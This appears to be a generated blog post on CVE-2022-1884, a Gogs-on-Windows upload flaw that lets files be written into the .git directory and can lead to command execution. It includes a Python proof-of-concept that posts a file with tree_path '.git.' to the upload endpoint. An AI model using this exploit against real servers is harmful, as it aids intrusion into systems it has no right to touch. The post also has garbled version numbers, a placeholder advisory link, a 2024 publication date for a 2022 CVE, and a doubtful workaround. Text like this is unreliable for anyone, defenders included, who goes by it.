CVE-2022-1884: Remote Command Execution Vulnerability in gogs/gogs (<=.12.7) When Deployed on Windows Servers

A significant security vulnerability (CVE-2022-1884) affecting gogs/gogs versions <=.12.7 when deployed on Windows servers has been discovered. This vulnerability allows a remote attacker to execute arbitrary commands on the affected system due to a problem with the validation of the tree_path parameter during file uploads. This post provides an overview of the exploit, code snippets to demonstrate the vulnerability, and links to the original references.

Vulnerability Details

The root cause of this remote command execution vulnerability is the improper validation of the tree_path parameter used during file uploads in gogs/gogs versions <=.12.7 when deployed on a Windows server. Specifically, an attacker can set the tree_path to .git. to upload a malicious file directly into the .git directory. This allows the attacker to write or rewrite the .git/config file.

The potential impact of this vulnerability is significant. If the core.sshCommand configuration option is set, an attacker could use this exploit to execute remote commands on the affected system.

The following code snippet demonstrates the vulnerability

import requests

target_url = "http://vulnerable_server.example.com";
repo_name = "test_repo"
file_name = "malicious.txt"
gogs_session_cookie = "your_gogs_session_cookie_here"

tree_path = ".git."
content = "fake_file_content"

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": f"i_like_gogs={gogs_session_cookie}"
}

data = {
    "repo_name": repo_name,
    "tree_path": tree_path,
    "content": content,
    "file_name": file_name
}

response = requests.post(f"{target_url}/user/test_repo/upload_file", headers=headers, data=data)

if response.status_code == 200:
    print("File uploaded successfully.")
else:
    print("Failed to upload file.")

This script sends a POST request to the specified target URL, uploading a malicious file into the .git directory using the .git. tree_path. Replace the target_url, gogs_session_cookie, and any other relevant variables with the appropriate values for your environment.

Mitigation Steps

To prevent this vulnerability from being exploited, users of gogs/gogs on Windows servers should upgrade to a version higher than .12.7, as the issue has been fixed in later versions.

In the meantime, administrators can apply the following workaround

Edit the .git/config file to explicitly disable core.sshCommand. This can be done by adding the following line under the [core] section in the config file:

sshCommand = ""

By disabling core.sshCommand, an attacker cannot exploit the vulnerability to execute remote commands on the affected system.

For more details about the CVE-2022-1884 vulnerability, consult the following resources

- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2022-1884
- Gogs Security Advisory: https://github.com/gogs/gogs/security/advisories/GHSA-xxxx-yyyy

Conclusion

The CVE-2022-1884 remote command execution vulnerability in gogs/gogs versions <=.12.7 on Windows servers poses a significant risk to users who have not updated their software. By understanding the details of the exploit, implementing the mitigation steps, and staying informed about future security updates, you can help protect your system from this dangerous vulnerability.

Timeline

Published on: 11/15/2024 11:15:07 UTC
Last modified on: 11/15/2024 20:35:02 UTC